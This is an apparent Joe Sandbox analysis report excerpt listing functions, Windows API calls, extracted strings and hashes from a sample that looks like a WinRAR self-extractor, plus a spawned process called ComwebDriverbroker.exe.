Opcode ID: 2834179de7757aa7e2a84bacfe5a0ad7b45126e418e6b52622a985bc279a68e2
Instruction ID: be2a473ba93844ddfca095cdbe893901ad6ce598ed3fa17f74d6cb3dde411a32
Opcode Fuzzy Hash: 2834179de7757aa7e2a84bacfe5a0ad7b45126e418e6b52622a985bc279a68e2
Instruction Fuzzy Hash: D8A163729002299ADF24EBA0CD45EFA73FE9F45304F0885A6B50AE3541EE349F85CF64

Function 006BB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006BB324

Part of subcall function 006B9097: IsProcessorFeaturePresent.KERNEL32(00000017,006B9086,00000050,006C3A34,?,0069D710,00000004,006D1030,?,?,006B9093,00000000,00000000,00000000,00000000,00000000), ref: 006B9099
Part of subcall function 006B9097: GetCurrentProcess.KERNEL32(C0000417,006C3A34,00000050,006D1030), ref: 006B90BB
Part of subcall function 006B9097: TerminateProcess.KERNEL32(00000000), ref: 006B90C2

Strings

., xrefs: 006BB4DB
*?, xrefs: 006BB1FB

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 251548143fde66dee4ad3cd281367bb81deffb88952124fd15d0d83821ce21d9
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: 7A518FB1E0020AAFDF14DFA8C881AEDBBF6EF58310F244169E854E7341E7B59E418B50

Function 006975DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006975E3

Part of subcall function 006A05DA: _wcslen.LIBCMT ref: 006A05E0

Part of subcall function 0069A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0069A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0069777F

Part of subcall function 0069A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0069A325,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A501
Part of subcall function 0069A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0069A325,?,?,?,0069A175,?,00000001,00000000,?,?), ref: 0069A532

Strings

:, xrefs: 00697654

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 186c09d5666cf00bdcea04214235336f3d326a57cde85a4266b803609b303b35
Instruction ID: 52b3884db66ff46014e71fb14a1d41e1a9ac81eb8111242cebaa6287a4bad774
Opcode Fuzzy Hash: 186c09d5666cf00bdcea04214235336f3d326a57cde85a4266b803609b303b35
Instruction Fuzzy Hash: B1418171800158A9EF25EB64CD99EEEB37EEF41300F00409EB605A6592DB745F85CF75

Function 0069B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0069B438
_wcschr.LIBVCRUNTIME ref: 0069B478

Strings

*, xrefs: 0069B38A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 955949b62f0c57a95f4d600f3bb5285f24bdf9179231d3401c945d9e026a4640
Instruction ID: 956f6d3be912947b11802f660d692c5f41f4746b917008f5e819a68b09b3860b
Opcode Fuzzy Hash: 955949b62f0c57a95f4d600f3bb5285f24bdf9179231d3401c945d9e026a4640
Instruction Fuzzy Hash: F13116221442119A9E30DA54BB026FF73EFDF94F20F15A01EF98447A47E7658D86B361

Function 006AB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006AB4E3
_wcslen.LIBCMT ref: 006AB4FE

Strings

}, xrefs: 006AB4D6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 5b7c1bbdb6af8cd6ef2d310a0b3aef1ba4264be52fdd9c7bffff878ae8c15f29
Instruction ID: a86406b0092e2b969f154fcdd9285d523165605ef3f5558d2c7ef1a6aa767e17
Opcode Fuzzy Hash: 5b7c1bbdb6af8cd6ef2d310a0b3aef1ba4264be52fdd9c7bffff878ae8c15f29
Instruction Fuzzy Hash: D621A1729043165ADB31FE64D845EAAB3DEDF92750F04042EF540C3243EB65DD888BA6

Function 0069F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0069F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0069F2E4
Part of subcall function 0069F2C5: GetProcAddress.KERNEL32(006D81C8,CryptUnprotectMemory), ref: 0069F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0069F33E), ref: 0069F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0069F3CA
CryptProtectMemory failed, xrefs: 0069F389

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 19066705372154fdcd12d66edb64c21b17f9b6591b1150ef5da985ae5f632fd6
Instruction ID: 0868e2279b61d15525426cf36862008cb1ca074851fe8c82f3bc7e74f140bafb
Opcode Fuzzy Hash: 19066705372154fdcd12d66edb64c21b17f9b6591b1150ef5da985ae5f632fd6
Instruction Fuzzy Hash: 4B112931A01229ABEF156F21DC45ABE3B5FFF00720B16812AFC05DB751DA789E0187D4

Function 006A101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,006A1160,?,00000000,00000000), ref: 006A1043
SetThreadPriority.KERNEL32(?,00000000), ref: 006A108A

Part of subcall function 00696C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00696C54

Part of subcall function 00696DCB: _wcschr.LIBVCRUNTIME ref: 00696E0A
Part of subcall function 00696DCB: _wcschr.LIBVCRUNTIME ref: 00696E19

Strings

CreateThread failed, xrefs: 006A104F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2706921342-3849766595
Opcode ID: 3a109a9510b12734e75afdb88a8326b7988f799a30e453c6b0a47ea1150b9478
Instruction ID: 5a1fa3599e4312a0f6120b0192fe508b5904edd9782820350a3dafda0f13cecf
Opcode Fuzzy Hash: 3a109a9510b12734e75afdb88a8326b7988f799a30e453c6b0a47ea1150b9478
Instruction Fuzzy Hash: A70167757443496BD7347E64EC61F76775BEB42751F10002EF6465A380CEA16C854A24

Function 0069C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0069C080

Strings

<9l, xrefs: 0069C076
?*<>|", xrefs: 0069C06D, 0069C07F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcschr
String ID: <9l$?*<>|"
API String ID: 2691759472-333360754
Opcode ID: b467d3287e6221e6275030c1b9ba48441a4b7ae000b90a67af4eb0f636e187f1
Instruction ID: edb4d61001406779c3c19e4bd9495aefc27bde1932d18ba89c5dd85aea66d7c8
Opcode Fuzzy Hash: b467d3287e6221e6275030c1b9ba48441a4b7ae000b90a67af4eb0f636e187f1
Instruction Fuzzy Hash: F8F06D53A8570285DF302F2899117B2B3EEEF95730F24491EE5C9877C2E6A288C09665

Function 006ADB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006ADBAC

Strings

Software\WinRAR SFX, xrefs: 006ADB95
j, xrefs: 006ADB9F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$j
API String ID: 176396367-400243817
Opcode ID: f9c00b54f420eccd4484bfb19cb1d5350c900798d29ee277afc45173161bc7f4
Instruction ID: 25f579a151fdba8e5d57e1b6b9a3d5af0a954c7b547c8b1e1eea4c070433d3e5
Opcode Fuzzy Hash: f9c00b54f420eccd4484bfb19cb1d5350c900798d29ee277afc45173161bc7f4
Instruction Fuzzy Hash: 02012171901168BADB21AB91DC09FEB7FBEEB05754F000056B54A91161DBB09F88CBE1

Function 006AAE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0069C29A: _wcslen.LIBCMT ref: 0069C2A2

Part of subcall function 006A1FDD: _wcslen.LIBCMT ref: 006A1FE5
Part of subcall function 006A1FDD: _wcslen.LIBCMT ref: 006A1FF6
Part of subcall function 006A1FDD: _wcslen.LIBCMT ref: 006A2006
Part of subcall function 006A1FDD: _wcslen.LIBCMT ref: 006A2014
Part of subcall function 006A1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0069B371,?,?,00000000,?,?,?), ref: 006A202F

Part of subcall function 006AAC04: SetCurrentDirectoryW.KERNELBASE(?,006AAE72,C:\Users\user\Desktop,00000000,006D946A,00000006), ref: 006AAC08

_wcslen.LIBCMT ref: 006AAE8B

Strings

C:\Users\user\Desktop, xrefs: 006AAE68
<j, xrefs: 006AAEC4

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <j$C:\Users\user\Desktop
API String ID: 521417927-1655065315
Opcode ID: 233a07a1e67a9d674008a4a2294ff19f19bf76c118f4d1280217b80fe2b912e7
Instruction ID: 843eb4356fba3f6499366f8211585655b923c4f00c53d9c87f45264ffdd214d4
Opcode Fuzzy Hash: 233a07a1e67a9d674008a4a2294ff19f19bf76c118f4d1280217b80fe2b912e7
Instruction Fuzzy Hash: 51014071D0021865DF50BBA49D0ADDA76FEAF09304F00045AE506E3291E6B49A44CAA5

Function 006BBB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B97E5: GetLastError.KERNEL32(?,006D1030,006B4674,006D1030,?,?,006B3F73,00000050,?,006D1030,00000200), ref: 006B97E9
Part of subcall function 006B97E5: _free.LIBCMT ref: 006B981C
Part of subcall function 006B97E5: SetLastError.KERNEL32(00000000,?,006D1030,00000200), ref: 006B985D
Part of subcall function 006B97E5: _abort.LIBCMT ref: 006B9863

_abort.LIBCMT ref: 006BBB80
_free.LIBCMT ref: 006BBBB4

Strings

pl, xrefs: 006BBBAB

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: pl
API String ID: 289325740-1786839575
Opcode ID: d3e52da015e3b2aeaca30477679a60e535dbd0730e39ea1357f5db9058e98e3b
Instruction ID: ddfbe2f3821ddbf6af926cefd14ef6033ce79bbffc98859a71f0fa2f52accc09
Opcode Fuzzy Hash: d3e52da015e3b2aeaca30477679a60e535dbd0730e39ea1357f5db9058e98e3b
Instruction Fuzzy Hash: 4B018EB1D006229BCB61AF589801AEDB7B3BF08720B15110EE82467295CFA66D81CFC5

Function 006AB425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 006AB42F

Strings

Zj, xrefs: 006AB441
(j, xrefs: 006AB457

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Malloc
String ID: (j$Zj
API String ID: 2696272793-911570601
Opcode ID: 507d7993a2cc69f8b68f75d03300c4ac77e1dfde2ca05dffe77c65068c885623
Instruction ID: c4c41a030c201e66873fe9653d7e9cf44afa00b287a4531bef74b6f4a3c3e872
Opcode Fuzzy Hash: 507d7993a2cc69f8b68f75d03300c4ac77e1dfde2ca05dffe77c65068c885623
Instruction Fuzzy Hash: C70169B6600118FF9F059FB0DC49CEEBBAEEF09344700515AB906D7220EB31AE44DBA0

Function 006A0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,006A1206,?), ref: 006A0FEA
GetLastError.KERNEL32(?), ref: 006A0FF6

Part of subcall function 00696C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00696C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 006A0FFF

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 854b9da564bfbcb0c00443b6e52cadab172ca963dc573c46fc882cb2bad350d3
Instruction ID: c166b0f48f67f4319158436c3c24570da3e861673bb891854c071b0dbf100321
Opcode Fuzzy Hash: 854b9da564bfbcb0c00443b6e52cadab172ca963dc573c46fc882cb2bad350d3
Instruction Fuzzy Hash: 7ED02E32A08230BACB203724AC0ADBE3C0BDB23331F214708F038683E6CE200D8146E6

Function 0069E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0069DA55,?), ref: 0069E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0069DA55,?), ref: 0069E2B1

Strings

RTL, xrefs: 0069E2AB

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: e0956822362a07b92aafb210c7f870e7eb7f87a71137ca124a0a73da9c63bcf8
Instruction ID: 8078cbeb3fa1da138183e134e3b7816b605163a33787f1f25187aab683b32116
Opcode Fuzzy Hash: e0956822362a07b92aafb210c7f870e7eb7f87a71137ca124a0a73da9c63bcf8
Instruction Fuzzy Hash: 5AC0123274072066EB3057646C0DF937A5A6B01B11F09544DB141E93D1D6A5C54086A1

Function 006AE47A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE467

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

zj, xrefs: 006AE47A
Uj, xrefs: 006AE461

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Uj$zj
API String ID: 1269201914-3257026137
Opcode ID: 837bc56d4f879c21617128d4e599c2f2bbaa00a9627971611c269807f2397438
Instruction ID: a9fa76e88b57cd4ccae901150efc391a5b5c709a1060f02c522d91edcd7f1856
Opcode Fuzzy Hash: 837bc56d4f879c21617128d4e599c2f2bbaa00a9627971611c269807f2397438
Instruction Fuzzy Hash: DEB012D16580007C314471155D06E37014FD1C6F20330402FF509C0181DC450E010D36

Function 006AE470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006AE467

Part of subcall function 006AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006AE8D0
Part of subcall function 006AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006AE8E1

Strings

pj, xrefs: 006AE470
Uj, xrefs: 006AE461

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: Uj$pj
API String ID: 1269201914-2291293944
Opcode ID: 77f677f5ad5ce0127f7807c04ed86f4eff629841b7832a4bd21836fcc7c99afa
Instruction ID: e21ed8fe4967b24f7216fbad8218b66244ccb8ede1bdbb497d86db1d7ad66c41
Opcode Fuzzy Hash: 77f677f5ad5ce0127f7807c04ed86f4eff629841b7832a4bd21836fcc7c99afa
Instruction Fuzzy Hash: 8AB012C1659040BC3144B1151D07D37014FC1C6B60330802FF909C0181DC414C010D32

Analysis Process: ComwebDriverbroker.exePID: 3536, Parent PID: 2216COMMON

Execution Graph

Execution Coverage:	8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD348A0D78 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2313484197.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd348a0000_ComwebDriverbroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e409457c27ab49a1bbc641cab181e31d8947f039d1581312618d5c86978b7355
Instruction ID: 539a89dcde1542a1485583de5f24b1de8d3f0980da4cd328b9483de7bebc915c
Opcode Fuzzy Hash: e409457c27ab49a1bbc641cab181e31d8947f039d1581312618d5c86978b7355
Instruction Fuzzy Hash: 3C91E175A18A998FE799DB6888793A97FE1FF96310F0400BED04DD72D2CBB92415C740

Function 00007FFD34D0E8B1 Relevance: 1.8, APIs: 1, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNELBASE ref: 00007FFD34D0EA61

Memory Dump Source

Source File: 00000005.00000002.2316287312.00007FFD34D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34D00000, based on PE: false

